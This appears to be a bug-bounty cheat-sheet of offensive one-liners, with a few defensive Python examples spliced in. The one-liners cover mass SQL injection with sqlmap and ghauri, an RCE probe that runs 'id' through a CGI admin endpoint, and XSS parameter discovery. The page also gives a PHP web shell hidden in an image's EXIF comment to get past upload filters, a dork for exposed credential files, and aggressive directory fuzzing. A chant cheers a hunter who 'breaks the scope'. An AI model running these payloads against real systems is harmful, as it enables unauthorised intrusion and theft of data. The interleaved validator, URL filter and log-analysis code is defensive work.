Search for Sensitive files from Wayback
waybackurls domain.com | grep --color -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar'
One liner to find RCE
cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
One liner to find sql Injection
#sql
cat subs.txt | (gau || hakrawler || katana || waybackurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#xss
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
XSS from javascript hidden params
#xss
assetfinder target.com | gau | egrep -v '(\.css|\.svg)' | while read url; do vars=$(curl -s "$url" | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '\.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"; done
Bypass File Upload Filtering
In image:
exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' shell.jpg
mv shell.jpg shell.php.jpg
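The naive extension check that shell.php.jpg is built to pass, next to a hardened validator that rejects both the double extension and the comment-embedded PHP. This is an added example, not code from the page; it assumes uploads are then stored under a generated name in a directory the web server never executes.

```python
"""Upload validator (added example): weak check vs. hardened check for image uploads."""
import os
import secrets

ALLOWED = {".jpg", ".jpeg", ".png", ".gif"}
# Leading bytes of the image formats we accept, mapped to the extension they imply.
MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png",
         b"GIF87a": ".gif", b"GIF89a": ".gif"}

def naive_is_image(filename):
    """Typical weak check: does an allowed extension appear anywhere in the name?
    "shell.php.jpg" passes, and an Apache AddHandler that keys on ".php" anywhere
    in a multi-extension name may still execute it."""
    return any(ext in filename.lower() for ext in ALLOWED)

def hardened_check(filename, data):
    """Return (accepted, reason). Looks only at the final suffix, requires the file
    header to match it, and refuses any body carrying a PHP open tag (the EXIF
    comment trick). Re-encoding the image with an image library is stronger still."""
    root, ext = os.path.splitext(os.path.basename(filename))
    ext = ".jpg" if ext.lower() == ".jpeg" else ext.lower()
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if "." in root:
        return False, "double extension"
    detected = next((kind for magic, kind in MAGIC.items() if data.startswith(magic)), None)
    if detected != ext:
        return False, "content does not match extension"
    if b"<?" in data:  # covers <?php and short tags hidden in metadata
        return False, "embedded script"
    return True, "ok"

def stored_name(filename, data):
    """Safe on-disk name: random, keeping only the validated extension; None if rejected."""
    ok, _ = hardened_check(filename, data)
    return f"{secrets.token_hex(8)}{os.path.splitext(filename)[1].lower()}" if ok else None

# Constructed samples: a minimal JPEG header/trailer, with and without a PHP tag in a comment segment.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
PHP_JPEG = b"\xff\xd8\xff\xfe" + b"<?php echo 1; ?>" + b"\xff\xd9"

if __name__ == "__main__":
    for name, blob in (("shell.php.jpg", CLEAN_JPEG), ("shell.jpg", PHP_JPEG), ("cat.jpg", CLEAN_JPEG)):
        print(name, "naive:", naive_is_image(name), "hardened:", hardened_check(name, blob))
```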
Time based SQL Injection using waybackurls
waybackurls TARGET.COM | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt
FileFetcher is a Python tool that extracts and filters URLs from archived Wayback Machine data based on file types like .pdf, .zip, .sql, and more. It checks the availability of each URL, saving valid ones with a 200 OK response to a text file, ideal for research or web scraping.
https://github.com/shivangmauryaa/FileFetcher.git
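An added example (not code from the page or from FileFetcher) that does the filtering step of the Wayback one-liner and of FileFetcher on the URL path rather than by substring: the grep pattern above also fires on ".pdf" inside a query string such as ?file=a.pdf, and its "1.xls" term matches almost anything. Run over an export of your own domain's archived URLs, it lists what was once reachable by file type; the sample input is constructed.

```python
"""Filter an archived-URL list for sensitive file types, matching on the URL path only."""
from collections import defaultdict
from urllib.parse import urlparse

# Same file types the grep above looks for; longer suffixes first so ".tar.gz" wins over nothing.
SENSITIVE_SUFFIXES = (
    ".tar.gz", ".xlsx", ".docx", ".pptx", ".json", ".xls", ".xml",
    ".pdf", ".sql", ".doc", ".txt", ".zip", ".tgz", ".bak", ".7z", ".rar",
)

def classify(url):
    """Return the matching suffix of the URL path, or None if it is not a sensitive type."""
    path = urlparse(url).path.lower()
    for suffix in SENSITIVE_SUFFIXES:
        if path.endswith(suffix):
            return suffix
    return None

def filter_urls(urls):
    """Group sensitive URLs by suffix, collapsing query-string variants of the same path."""
    hits = defaultdict(set)
    for raw in urls:
        raw = raw.strip()
        if not raw:
            continue
        suffix = classify(raw)
        if suffix:
            p = urlparse(raw)
            hits[suffix].add(f"{p.scheme}://{p.netloc}{p.path}")
    return {k: sorted(v) for k, v in hits.items()}

# Constructed sample standing in for `waybackurls example.com` output.
SAMPLE = """
http://example.com/reports/q1-2019.pdf
https://example.com/backup/db.sql?v=2
https://example.com/backup/db.sql
https://example.com/download?file=notes.pdf
https://example.com/index.php?page=1
https://example.com/assets/app.json
https://example.com/old/site.tar.gz
""".splitlines()

if __name__ == "__main__":
    for suffix, found in sorted(filter_urls(SAMPLE).items()):
        print(suffix, *found, sep="\n  ")
```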
Top 25 JavaScript path files used to store sensitive information in Web Application
01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js
10. /js/authorization.js
11. /js/encryption.js
12. /js/certificates.js
13. /js/ssl_keys.js
14. /js/passphrases.js
15. /js/policies.js
16. /js/permissions.js
17. /js/privileges.js
18. /js/hashes.js
19. /js/salts.js
20. /js/nonces.js
21. /js/signatures.js
22. /js/digests.js
23. /js/tokens.js
24. /js/cookies.js
25. /js/topsecr3tdonotlook.js
Dork :
intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !
- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
What does the command do?
Searches for hidden or useful files or paths within the list of links. It is used in security testing to detect sensitive or exposed files on the server.
dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt
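On the receiving end, the ffuf and dirsearch runs above leave a distinctive trail: one client producing a burst of 404s on backup/config extensions, and occasionally a 2xx where such a file really is exposed. This added example (not from the page) separates the two in access logs; the combined-format log lines are constructed.

```python
"""Flag extension-fuzzing clients and actually exposed sensitive paths in a web access log."""
import re
from collections import Counter, defaultdict

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions from the ffuf/dirsearch lists above that a production site should never serve.
SENSITIVE_EXT = re.compile(r"\.(bak|backup|old|swp|sql|sql\.gz|tar\.gz|zip|env|log|config|conf|inc)(\?|$)", re.I)

def parse(line):
    """Combined-format line -> dict of ip/method/path/status, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def analyse(lines, fuzz_threshold=5):
    """Return (fuzzers, exposed): IPs whose 403/404 count on sensitive paths reaches the
    threshold, and sensitive paths that answered 2xx/3xx together with who fetched them."""
    misses = Counter()
    exposed = defaultdict(set)
    for line in lines:
        rec = parse(line)
        if not rec or not SENSITIVE_EXT.search(rec["path"]):
            continue
        status = int(rec["status"])
        if status in (403, 404):
            misses[rec["ip"]] += 1
        elif 200 <= status < 400:
            exposed[rec["path"]].add(rec["ip"])
    fuzzers = {ip: n for ip, n in misses.items() if n >= fuzz_threshold}
    return fuzzers, {p: sorted(ips) for p, ips in exposed.items()}

# Constructed log: one client probing extensions (and hitting a real backup), one normal client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin.bak HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin.sql HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /admin.zip HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /config.env HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /db.sql.gz HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /backup/site.tar.gz HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Oct/2023:13:56:02 +0000] "GET /app.log HTTP/1.1" 404 153 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    fuzzers, exposed = analyse(SAMPLE_LOG)
    print("probable fuzzers:", fuzzers)
    print("exposed sensitive paths:", exposed)
```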